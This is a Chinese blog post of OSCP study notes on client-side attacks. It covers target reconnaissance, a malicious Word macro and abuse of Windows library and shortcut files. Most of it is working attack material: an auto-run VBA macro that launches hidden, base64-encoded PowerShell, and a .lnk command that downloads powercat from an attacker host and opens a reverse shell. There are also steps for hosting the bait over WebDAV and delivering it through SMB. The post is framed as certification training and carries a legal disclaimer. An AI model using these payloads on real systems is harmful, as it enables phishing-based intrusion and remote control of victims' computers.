文章总结: 本文是OSCP认证学习系列的一部分,详细介绍了客户端攻击技术,包括目标枚举、Office宏攻击和Windows库文件滥用。文章提供了具体的技术实现方法,如使用exiftool收集信息、创建恶意Word宏执行PowerShell命令、利用.Library-ms和.lnk文件进行攻击,以及设置WebDAV服务器和SMB共享传递恶意文件。这些技术对渗透测试和红队操作人员具有实用价值。
综合评分: 91
文章分类: 渗透测试,红队,WEB安全,应用安全,漏洞分析
OSCP | 客户端攻击
原创
小A法师
高级红队专家
2024年6月27日 07:13
北京
教材和学习方式详见开篇:OSCP学习之路-开篇
本篇对应教材第11章,主要内容“客户端攻击目标枚举”、“OFFICE攻击”、“滥用Windows库文件”,记录使用工具和命令
11.1 客户端攻击目标枚举
11.1.1 信息收集
site:example.com filetype:pdf
gobuster使用-x参数指定文件后缀,下载文件,查看文件信息
exiftool -a -u brochure.pdf
注意作者、程序版本等
11.1.2 客户端指纹
网站
https://canarytokens.com/
11.2 office攻击
11.2.3 word宏横向
文件后缀
.doc.docm
使用宏执行powershell
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell
$Text = "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell"$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)$EncodedText =[Convert]::ToBase64String($Bytes)$EncodedText
加入到宏当中时需要50字符一行,用python代码实现
str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."
n = 50
for i in range(0, len(str), n):print("Str = Str + " + '"' + str[i:i+n] + '"')
完整宏
Sub AutoOpen() MyMacroEnd Sub
Sub Document_Open() MyMacroEnd Sub
Sub MyMacro() Dim Str As String Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU" Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd" Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB" ... Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA" Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA" Str = Str + "A== "
CreateObject("Wscript.Shell").Run StrEnd Sub
11.3 滥用Windows库文件
11.3.1 利用
涉及文件
.Library-ms.lnk
安装webdav
pip3 install wsgidav
启动webdav
mkdir /home/kali/webdavtouch /home/kali/webdav/test.txt/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
创建config.Library-ms文件
<?xml version="1.0" encoding="UTF-8"?><libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"><name>@windows.storage.dll,-34582</name><version>6</version><isLibraryPinned>true</isLibraryPinned><iconReference>imageres.dll,-1003</iconReference><templateInfo><folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType></templateInfo><searchConnectorDescriptionList><searchConnectorDescription><isDefaultSaveLocation>true</isDefaultSaveLocation><isSupported>false</isSupported><simpleLocation><url>http://192.168.119.2</url></simpleLocation></searchConnectorDescription></searchConnectorDescriptionList></libraryDescription>
url填写webdav地址
创建automatic_configuration.lnk文件
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');powercat -c 192.168.119.3 -p 4444 -e powershell"
两个文件都放在webdav里面,然后把config.Library-ms发给用户,可以邮件可以smb
cd webdavrm test.txtsmbclient //192.168.50.195/share -c 'put config.Library-ms'
有用户打开文件夹就会获得反弹shell
我在第一篇里提到的一些有价值的认证,还有什么质量高的认证考试我没想到的,可以私我
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:高级红队专家 小A法师《OSCP | 客户端攻击》